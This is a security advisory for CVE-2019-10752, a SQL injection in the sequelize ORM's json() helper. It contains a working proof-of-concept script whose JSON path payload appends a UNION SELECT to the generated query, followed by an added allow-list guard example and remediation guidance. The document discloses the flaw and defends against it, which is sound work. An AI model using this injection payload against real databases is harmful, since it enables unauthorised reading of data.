SQL Injection
Affecting sequelize package, versions >=4.0.0 <4.44.3 || >=5.0.0 <5.15.1
Overview
sequelize is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.
Affected versions of this package are vulnerable to SQL Injection because the sequelize.json() helper function does not escape values properly when formatting sub paths for JSON queries on MySQL, MariaDB and SQLite: the sub path string is interpolated into the generated SQL, so a path that is influenced by request data can alter the query.
PoC by Snyk
const Sequelize = require('./'); // './' resolves to the sequelize package when run from its own checkout
const sequelize = new Sequelize('mysql', 'root', 'root', {
  host: 'localhost',
  port: '3306',
  dialect: 'mariadb',
  logging: console.log, // log the generated SQL so the unescaped path is visible
});

class Project extends Sequelize.Model {}
Project.init({
  name: Sequelize.STRING,
  target: Sequelize.JSON,
}, {
  sequelize,
  tableName: 'projects',
});

(async () => {
  await sequelize.sync();
  // The JSON sub path passed to sequelize.json() reaches the query text unescaped.
  console.log(await Project.findAll({
    where: { name: sequelize.json("target.id')) = 10 UNION SELECT VERSION(); -- ", 10) },
    attributes: ['name'],
    raw: true,
  }));
})();
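The following is an added example, not code from sequelize or from Snyk's PoC. It models the defect class the advisory describes (a JSON sub path spliced verbatim into a quoted SQL literal) with a simplified stand-in formatter, and shows an allow-list guard an application can place in front of sequelize.json() for any path that is influenced by request data, which is the compensating control until the package is upgraded. All function and variable names here are assumptions; the only page value reused is the PoC path string.

```javascript
// Added example, not sequelize's code. Models the advisory's defect class and
// an application-side allow-list guard for JSON sub paths.

// Toy stand-in for the unescaped formatting: the sub path is interpolated into
// a quoted SQL literal as-is. Simplified model, not the ORM's query generator.
function modelUnescapedJsonPath(pathStr) {
  const [column, ...subPath] = pathStr.split('.');
  return `json_extract(\`${column}\`, '$.${subPath.join('.')}')`;
}

// Allow-list for a JSON path: a column name followed by one or more key
// segments, each an identifier or a numeric array index. Quotes, parentheses,
// spaces and comment markers never match, so they are rejected before the
// string can reach the ORM.
const SEGMENT = /^(?:[A-Za-z_][A-Za-z0-9_]*|\d+)$/;

function isSafeJsonPath(pathStr) {
  if (typeof pathStr !== 'string' || pathStr.length === 0) return false;
  const segments = pathStr.split('.');
  return segments.length >= 2 && segments.every((s) => SEGMENT.test(s));
}

// Guarded wrapper: validate the path, then format it. In a real application
// this is the point where the call into sequelize.json() would be made.
function guardedJsonPath(pathStr) {
  if (!isSafeJsonPath(pathStr)) {
    throw new Error(`rejected JSON path: ${JSON.stringify(pathStr)}`);
  }
  return modelUnescapedJsonPath(pathStr);
}

// Constructed inputs: a benign path and the path string from the advisory's PoC.
const BENIGN_PATH = 'target.id';
const POC_PATH = "target.id')) = 10 UNION SELECT VERSION(); -- ";

// Returns the benign formatted path, what the unguarded model produces for the
// PoC path (the literal is broken open), and whether the guard rejects it.
function demo() {
  return {
    benign: guardedJsonPath(BENIGN_PATH),
    unguardedPoc: modelUnescapedJsonPath(POC_PATH),
    pocRejected: !isSafeJsonPath(POC_PATH),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The guard is deliberately an allow-list rather than an escape routine: a JSON key that an application lets a client choose should only ever be an identifier or an array index, so rejecting everything else is both simpler and easier to audit than trying to quote arbitrary input correctly for three dialects.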
Remediation
Upgrade sequelize to version 4.44.3, 5.15.1 or higher.
References
CVSS Score: 7.3 (high severity)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: Low
- Integrity: Low
- Availability: Low
- Credit: Snyk Security Team
- CVE: CVE-2019-10752
- CWE: CWE-89
- Snyk ID: SNYK-JS-SEQUELIZE-459751
- Disclosed: 18 Aug, 2019
- Published: 19 Aug, 2019